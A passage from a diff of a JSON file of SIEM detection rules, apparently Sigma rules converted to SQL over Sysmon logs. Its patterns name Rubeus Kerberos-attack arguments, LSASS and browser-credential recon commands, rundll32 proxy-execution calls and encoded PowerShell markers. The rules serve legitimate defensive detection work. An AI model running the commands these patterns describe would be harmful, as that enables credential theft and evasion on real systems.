LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "author": "Florian Roth (Nextron Systems)", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "status": "test", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Suspicious High IntegrityLevel Conhost Legacy Option", - "id": "3037d961-21e9-4732-b27a-637bcc7bf539", - "status": "experimental", - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", - "author": "frack113", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Very Likely, including launching cmd.exe via Run As Administrator" + "System administrator Usage" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_legacy_option.yml" + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", + "status": "experimental", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Legitimate use of debugging tools" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", - "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Where Execution", + "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "status": "experimental", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_where_browser_data_recon.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "status": "experimental", - "description": "Detects execution of 